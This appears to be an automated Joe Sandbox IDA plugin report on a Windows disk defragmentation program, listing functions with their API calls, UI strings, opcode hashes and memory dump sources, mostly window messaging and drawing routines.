                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CopyRect
                                                                                                                                                                                                                                                                                                • String ID: Bottom$Left$Margin$Right$Top$`=$=
                                                                                                                                                                                                                                                                                                • API String ID: 1989077687-1885521073
                                                                                                                                                                                                                                                                                                • Opcode ID: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                                • Instruction ID: 7cbf7df4fec77659c91c3afac7ac99305081f53a3d300e0ff47080e44fb4b669
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EB166766043419FC310DF28C881B5BB7E8FB98704F148A2EF58A97391DB75E944CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                                • String ID: %.2f%%$%I64u
                                                                                                                                                                                                                                                                                                • API String ID: 2245208738-2288124401
                                                                                                                                                                                                                                                                                                • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00418B07
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00418BA8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000083FE,?,?), ref: 00418BF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 00418C9F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00418D51
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                                • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                                • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                                • Opcode ID: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                                • Instruction ID: 9e016845d88e4024dd1218f79a327356caeee79904b42a6c0a28c628b7da3379
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2691E0712047009BD710EF24DD85FDAB7E5BF98704F00092EF945AB286DB78E945CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000133D,00000000,00000001), ref: 0042CE5B
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,1088D068,?,?,?,?,?,?,?,?,?,004217B6), ref: 0042CEBD
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042CEF4
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042CF49
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$RedrawWindow
                                                                                                                                                                                                                                                                                                • String ID: %s (%c:)$%s (%s)$3401034$3401126
                                                                                                                                                                                                                                                                                                • API String ID: 648961319-3732436656
                                                                                                                                                                                                                                                                                                • Opcode ID: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                                • Instruction ID: fd74af85edc4f78d52bbe53b36b76dc0b3b7e67d0ab5ffb778a9a62391dde0ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E718D716043409FD324DF64DD85FABBBF4EF88700F10492EFA5A96290DBB4A944CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(00497F28), ref: 00419C49
                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(00497F30), ref: 00419C54
                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00419C70
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419C9C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$Counter$AddressFrequencyHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: NtQuerySystemInformation$ntdll
                                                                                                                                                                                                                                                                                                • API String ID: 3025674679-3593917365
                                                                                                                                                                                                                                                                                                • Opcode ID: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                                • Instruction ID: d06557f50192d5db3270ba6b6212bac26de826900838c4c68c4281c4e513f8d9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF518F71B1C301ABD7149F11FD55AAA37E4FB98780F108C3EE585A2268FB3499418BDD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CAB6
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0042CAE7
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0042CB0D
                                                                                                                                                                                                                                                                                                • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB22
                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0042CB35
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0042CB43
                                                                                                                                                                                                                                                                                                • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB58
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$NotifyParentVisibleWindow
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 2910063261-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                                • Instruction ID: cbd818397c052fadd252f380dd8efe1df66f27c17fa2dba641e1c387511c7e9b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0511030764700ABE224EF31DDD6FEA7394BB50B04F90842EB25F9A1D19FA47944CB99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402041$3402042$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3786962624
                                                                                                                                                                                                                                                                                                • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00416BBB
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00416BCF
                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00416BDE
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000198,00000000,?), ref: 00416BFF
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00416C10
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000198,?,?), ref: 00416C74
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 00416C87
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00416C98
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?), ref: 00416CC7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$MessageSend$Invalidate$ClientCursorScreen
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2454936240-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                                • Instruction ID: e3b87b86549111153a689a6de42a5e443b1792048b086b4c3e38e8d95830a062
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41846961993d4e238d2a253bad1eeefc775d047419a5e1f45b38c98fcc342d77
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3413BB1208301AFC310DF65D884EABB7E9FBC8710F004A2EF59987250E775E945CBA6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004318DA
                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004319AA
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00431B90
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00431BCE
                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00431BEF
                                                                                                                                                                                                                                                                                                • AlphaBlend.MSIMG32(?,?,?,?,00000003,?,00000000,00000000,?,00000003,00000000,00000000,00000000,?,?,00F0F0F0), ref: 00431C5D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateRect$AlphaBitmapBlendCopyFrameObjectSelect
                                                                                                                                                                                                                                                                                                • String ID: Z
                                                                                                                                                                                                                                                                                                • API String ID: 54210234-1505515367
                                                                                                                                                                                                                                                                                                • Opcode ID: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                                • Instruction ID: 0792d4e533d00b1b26a73fc7749f663e28f4755597dc11c0d4e9561af80c2fe6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f029b77f6b4eb3bbc3495fe3d68357bdf896ac53e414383373f8e8c30d0e72a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DC112716083418FC724DF69C984A5BBBE5AFC8704F108A2EF58987391DB74E909CB96
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 3401059$3401060$3401061$3401062$<a>%s</a>
                                                                                                                                                                                                                                                                                                • API String ID: 0-135031447
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                                • Instruction ID: 570f8eb3785bc855bef0c474daa2501289258084391a13b0a6423d05570a55ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d18fe7b7d33c6ca33f908e1a40e0b7338c7c8696b9367286f1202db6d62bc10
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D81D7717543005BC714EF218C42BDA33A4AF88714F14853FBA0D6B2C6DBB9E985879E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: EnterCriticalSection.KERNEL32 ref: 00401305
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004012D0: LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401316
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDC.USER32(00000000), ref: 004650D8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004650E9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004650F0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,00000058), ref: 004650F9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00465108
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004650D0: ReleaseDC.USER32(00000000,00000000), ref: 0046512C
                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00465580
                                                                                                                                                                                                                                                                                                • SetRect.USER32 ref: 004655DE
                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000005,00000000,00000005,00000000), ref: 004655ED
                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(0000000E,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,Arial), ref: 00465611
                                                                                                                                                                                                                                                                                                • GdiplusStartup.GDIPLUS(?,?,?,00000000,?,?,?,?,?,?,00000005,00000000,00000005,00000000,?,00000000), ref: 00465655
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                                • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                                • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                                • Opcode ID: b00c1959a732abe81b38a04023ca8e72d7a63f1345359439d75abd74fc18455c
                                                                                                                                                                                                                                                                                                • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b00c1959a732abe81b38a04023ca8e72d7a63f1345359439d75abd74fc18455c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32 ref: 00429964
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0042998F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: TranslateMessage.USER32(?), ref: 0042999A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: DispatchMessageW.USER32(?), ref: 004299A1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004299B0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004298F0: MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,?,000004FF), ref: 004299C9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00424612
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SendMessageW.USER32(?,000010A9,?,00000000), ref: 00424C61
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00424C20: SetForegroundWindow.USER32(?), ref: 00424C6D
                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 0042452F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$MultipleObjectsPeekSendWait$DispatchForegroundPostTranslateWindow
                                                                                                                                                                                                                                                                                                • String ID: "RightMenuDisk"$"RightMenuFile"$-AutoDefragmention$-BootTimeDefrag$ScheduleStart
                                                                                                                                                                                                                                                                                                • API String ID: 784092869-278688185
                                                                                                                                                                                                                                                                                                • Opcode ID: ae75744f42937a93e4d978927d4a407ffc77d4ecce76bde2d063ee0ff42c9edc
                                                                                                                                                                                                                                                                                                • Instruction ID: c97898347ab5420be132615685895ca4f66fbeb7c47801a8b84119e28bf46611
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae75744f42937a93e4d978927d4a407ffc77d4ecce76bde2d063ee0ff42c9edc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251C431304310AFC300EF15EDC5A6BB7E4EBD8755F84092EF54A92291DBB89988CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00465A5F
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00465A78
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00465B27
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00465B49
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00465B61
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00465BA5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$ClientMessageParentReleaseSendWindow
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 330964712-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                                • Instruction ID: b1a5f572caf67006923a9ef52c219ce68de25ddbd2c2a7f7615237fc757273c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aafe33e43f13557e9fd3d95a85fa062db54e1fb928152b145d4fd0b75ee94390
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0510371600B019FD324DF79C889BA7B3E9BF88704F008A1DE5AA97281DB74B854CF59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0042F900
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 0042F916
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,?), ref: 0042FA08
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3401074$3401075$3401076$3401077
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1879149864
                                                                                                                                                                                                                                                                                                • Opcode ID: c4bce1112986585be18b77c07089e63f6cda37178a12ed3d6a88cb22f3d1e080
                                                                                                                                                                                                                                                                                                • Instruction ID: b1405050125067dfa2b98fefbbf4893992a49d55c405f1a2d248d2381da72ad7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4bce1112986585be18b77c07089e63f6cda37178a12ed3d6a88cb22f3d1e080
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D3168F07903007BE674EB258D83FEA72A59B44B54F20892FB71E762D1CAF87844965C
                                                                                                                                                                                                                                                                                                APIs
